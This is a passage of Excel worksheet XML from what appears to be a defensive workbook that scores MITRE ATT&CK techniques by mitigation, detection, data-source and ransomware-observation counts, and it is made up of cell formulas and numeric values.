      </c>
      <c r="AM67" s="25">
        <f>IF(AL67="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN67" s="52">
        <v>0</v>
      </c>
      <c r="AO67" s="51">
        <v>0</v>
      </c>
      <c r="AP67" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.8559227300190487E-2</v>
      </c>
      <c r="AQ67" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.16186409100063495</v>
      </c>
      <c r="AR67" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.16186409100063495</v>
      </c>
      <c r="AS67" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT67" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU6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68" spans="1:47" ht="32.1">
      <c r="A68" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.28984384295666665</v>
      </c>
      <c r="B68" s="25">
        <f>SUM(H68,M68,V68)*(1+SUM(AE68,AG68,AI68,AK68,AM68))</f>
        <v>1.5651050962333335</v>
      </c>
      <c r="C68" s="25" t="s">
        <v>352</v>
      </c>
      <c r="D68" s="25" t="s">
        <v>353</v>
      </c>
      <c r="E68" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F68" s="51">
        <v>6</v>
      </c>
      <c r="G68" s="51">
        <v>5</v>
      </c>
      <c r="H68" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.55000000000000004</v>
      </c>
      <c r="I68">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.6</v>
      </c>
      <c r="J68">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.6</v>
      </c>
      <c r="K68">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.5</v>
      </c>
      <c r="L68">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.5</v>
      </c>
      <c r="M68" s="44">
        <v>7.7231299999999999E-3</v>
      </c>
      <c r="N68" s="51">
        <v>0</v>
      </c>
      <c r="O68" s="51">
        <v>13</v>
      </c>
      <c r="P68" s="51">
        <v>24</v>
      </c>
      <c r="Q68" s="51">
        <v>25</v>
      </c>
      <c r="R68" s="52" t="s">
        <v>354</v>
      </c>
      <c r="S68" s="51">
        <v>11</v>
      </c>
      <c r="T68" s="51" t="s">
        <v>355</v>
      </c>
      <c r="U68" s="51">
        <v>23</v>
      </c>
      <c r="V68" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.61904761904761907</v>
      </c>
      <c r="W68">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>34</v>
      </c>
      <c r="X68">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.61818181818181817</v>
      </c>
      <c r="Y68">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.61818181818181817</v>
      </c>
      <c r="Z68">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>62</v>
      </c>
      <c r="AA68">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.62</v>
      </c>
      <c r="AB68">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.62</v>
      </c>
      <c r="AC68" s="29" t="s">
        <v>356</v>
      </c>
      <c r="AD68" s="25" t="str" cm="1">
        <f t="array" ref="AD68">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC68)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE68" s="25">
        <f>IF(AD68="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF68" s="25" t="str" cm="1">
        <f t="array" ref="AF68">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC68)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG68" s="25">
        <f>IF(AF68="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH68" s="25" t="str" cm="1">
        <f t="array" ref="AH68">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC68)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI68" s="25">
        <f>IF(AH68="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ68" s="25" t="str" cm="1">
        <f t="array" ref="AJ68">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC68)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK68" s="25">
        <f>IF(AJ68="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL68" s="25" t="str" cm="1">
        <f t="array" ref="AL68">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC68)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM68" s="25">
        <f>IF(AL68="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN68" s="52">
        <v>4</v>
      </c>
      <c r="AO68" s="51">
        <v>1</v>
      </c>
      <c r="AP68" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.28984384295666665</v>
      </c>
      <c r="AQ68" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.5217016987444445</v>
      </c>
      <c r="AR68" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.5217016987444445</v>
      </c>
      <c r="AS68" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AT68" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AU6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69" spans="1:47" ht="48">
      <c r="A69" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.1345592528095238</v>
      </c>
      <c r="B69" s="25">
        <f>SUM(H69,M69,V69)*(1+SUM(AE69,AG69,AI69,AK69,AM69))</f>
        <v>0.67892586142857136</v>
      </c>
      <c r="C69" s="25" t="s">
        <v>357</v>
      </c>
      <c r="D69" s="25" t="s">
        <v>358</v>
      </c>
      <c r="E69" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F69" s="51">
        <v>1</v>
      </c>
      <c r="G69" s="51">
        <v>1</v>
      </c>
      <c r="H69" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I69">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J69">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K69">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L69">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M69" s="44">
        <v>7.4972900000000002E-3</v>
      </c>
      <c r="N69" s="51">
        <v>1</v>
      </c>
      <c r="O69" s="51">
        <v>14</v>
      </c>
      <c r="P69" s="51">
        <v>24</v>
      </c>
      <c r="Q69" s="51">
        <v>15</v>
      </c>
      <c r="R69" s="52" t="s">
        <v>359</v>
      </c>
      <c r="S69" s="51">
        <v>21</v>
      </c>
      <c r="T69" s="51" t="s">
        <v>360</v>
      </c>
      <c r="U69" s="51">
        <v>12</v>
      </c>
      <c r="V69" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.5714285714285714</v>
      </c>
      <c r="W69">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>33</v>
      </c>
      <c r="X69">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.6</v>
      </c>
      <c r="Y69">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.6</v>
      </c>
      <c r="Z69">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>54</v>
      </c>
      <c r="AA69">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.54</v>
      </c>
      <c r="AB69">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.54</v>
      </c>
      <c r="AC69" s="29" t="s">
        <v>141</v>
      </c>
      <c r="AD69" s="25" t="str" cm="1">
        <f t="array" ref="AD69">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC69)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE69" s="25">
        <f>IF(AD69="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF69" s="25" t="str" cm="1">
        <f t="array" ref="AF69">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC69)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG69" s="25">
        <f>IF(AF69="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH69" s="25" t="str" cm="1">
        <f t="array" ref="AH69">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC69)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI69" s="25">
        <f>IF(AH69="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ69" s="25" t="str" cm="1">
        <f t="array" ref="AJ69">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC69)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK69" s="25">
        <f>IF(AJ69="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL69" s="25" t="str" cm="1">
        <f t="array" ref="AL69">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC69)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM69" s="25">
        <f>IF(AL69="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN69" s="60">
        <v>2</v>
      </c>
      <c r="AO69" s="51">
        <v>1</v>
      </c>
      <c r="AP69" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.1345592528095238</v>
      </c>
      <c r="AQ69" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.22630862047619046</v>
      </c>
      <c r="AR69" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.22630862047619046</v>
      </c>
      <c r="AS69" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT69" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU6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70" spans="1:47" ht="32.1">
      <c r="A70" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>9.7741124692952375E-2</v>
      </c>
      <c r="B70" s="25">
        <f>SUM(H70,M70,V70)*(1+SUM(AE70,AG70,AI70,AK70,AM70))</f>
        <v>0.6440779135961906</v>
      </c>
      <c r="C70" s="25" t="s">
        <v>361</v>
      </c>
      <c r="D70" s="25" t="s">
        <v>362</v>
      </c>
      <c r="E70" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F70" s="51">
        <v>5</v>
      </c>
      <c r="G70" s="51">
        <v>1</v>
      </c>
      <c r="H70" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="I70">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.5</v>
      </c>
      <c r="J70">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.5</v>
      </c>
      <c r="K70">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L70">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M70" s="44">
        <v>7.06866E-3</v>
      </c>
      <c r="N70" s="51">
        <v>0</v>
      </c>
      <c r="O70" s="51">
        <v>18</v>
      </c>
      <c r="P70" s="51">
        <v>1</v>
      </c>
      <c r="Q70" s="51">
        <v>4</v>
      </c>
      <c r="R70" s="51"/>
      <c r="S70" s="51">
        <v>1</v>
      </c>
      <c r="T70" s="52" t="s">
        <v>363</v>
      </c>
      <c r="U70" s="51">
        <v>15</v>
      </c>
      <c r="V70" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.26190476190476192</v>
      </c>
      <c r="W70">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>16</v>
      </c>
      <c r="X70">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.29090909090909089</v>
      </c>
      <c r="Y70">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.29090909090909089</v>
      </c>
      <c r="Z70">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>23</v>
      </c>
      <c r="AA70">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.23</v>
      </c>
      <c r="AB70">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.23</v>
      </c>
      <c r="AC70" s="29" t="s">
        <v>183</v>
      </c>
      <c r="AD70" s="25" t="str" cm="1">
        <f t="array" ref="AD70">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC70)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE70" s="25">
        <f>IF(AD70="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF70" s="25" t="str" cm="1">
        <f t="array" ref="AF70">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC70)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG70" s="25">
        <f>IF(AF70="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH70" s="25" t="str" cm="1">
        <f t="array" ref="AH70">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC70)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI70" s="25">
        <f>IF(AH70="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ70" s="25" t="str" cm="1">
        <f t="array" ref="AJ70">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC70)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK70" s="25">
        <f>IF(AJ70="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL70" s="25" t="str" cm="1">
        <f t="array" ref="AL70">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC70)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM70" s="25">
        <f>IF(AL70="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN70" s="60">
        <v>1</v>
      </c>
      <c r="AO70" s="51">
        <v>1</v>
      </c>
      <c r="AP70" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>9.7741124692952375E-2</v>
      </c>
      <c r="AQ70" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.21469263786539686</v>
      </c>
      <c r="AR70" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.21469263786539686</v>
      </c>
      <c r="AS70" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT70" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU7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71" spans="1:47" ht="32.1">
      <c r="A71" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.7023125963333328E-2</v>
      </c>
      <c r="B71" s="25">
        <f>SUM(H71,M71,V71)*(1+SUM(AE71,AG71,AI71,AK71,AM71))</f>
        <v>0.43689792630000002</v>
      </c>
      <c r="C71" s="25" t="s">
        <v>364</v>
      </c>
      <c r="D71" s="25" t="s">
        <v>365</v>
      </c>
      <c r="E71" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F71" s="51">
        <v>2</v>
      </c>
      <c r="G71" s="51">
        <v>1</v>
      </c>
      <c r="H71" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.15000000000000002</v>
      </c>
      <c r="I71">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J71">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K71">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L71">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M71" s="44">
        <v>7.0661099999999996E-3</v>
      </c>
      <c r="N71" s="51">
        <v>0</v>
      </c>
      <c r="O71" s="51">
        <v>2</v>
      </c>
      <c r="P71" s="51">
        <v>2</v>
      </c>
      <c r="Q71" s="51">
        <v>0</v>
      </c>
      <c r="R71" s="52" t="s">
        <v>366</v>
      </c>
      <c r="S71" s="51">
        <v>7</v>
      </c>
      <c r="T71" s="51" t="s">
        <v>367</v>
      </c>
      <c r="U71" s="51">
        <v>9</v>
      </c>
      <c r="V71" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.17142857142857143</v>
      </c>
      <c r="W71">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>16</v>
      </c>
      <c r="X71">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.29090909090909089</v>
      </c>
      <c r="Y71">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.29090909090909089</v>
      </c>
      <c r="Z71">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>4</v>
      </c>
      <c r="AA71">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.04</v>
      </c>
      <c r="AB71">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.04</v>
      </c>
      <c r="AC71" s="29" t="s">
        <v>368</v>
      </c>
      <c r="AD71" s="25" t="str" cm="1">
        <f t="array" ref="AD71">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC71)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE71" s="25">
        <f>IF(AD71="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF71" s="25" t="str" cm="1">
        <f t="array" ref="AF71">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC71)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG71" s="25">
        <f>IF(AF71="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH71" s="25" t="str" cm="1">
        <f t="array" ref="AH71">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC71)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI71" s="25">
        <f>IF(AH71="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ71" s="25" t="str" cm="1">
        <f t="array" ref="AJ71">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC71)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK71" s="25">
        <f>IF(AJ71="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL71" s="25" t="str" cm="1">
        <f t="array" ref="AL71">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC71)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM71" s="25">
        <f>IF(AL71="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN71" s="58">
        <v>1</v>
      </c>
      <c r="AO71" s="51">
        <v>1</v>
      </c>
      <c r="AP71" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.7023125963333328E-2</v>
      </c>
      <c r="AQ71" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.14563264210000001</v>
      </c>
      <c r="AR71" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.14563264210000001</v>
      </c>
      <c r="AS71" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT71" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU7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72" spans="1:47" ht="48">
      <c r="A72" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.7536174216380948E-2</v>
      </c>
      <c r="B72" s="25">
        <f>SUM(H72,M72,V72)*(1+SUM(AE72,AG72,AI72,AK72,AM72))</f>
        <v>0.27536174216380949</v>
      </c>
      <c r="C72" s="25" t="s">
        <v>369</v>
      </c>
      <c r="D72" s="25" t="s">
        <v>370</v>
      </c>
      <c r="E72" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F72" s="51">
        <v>1</v>
      </c>
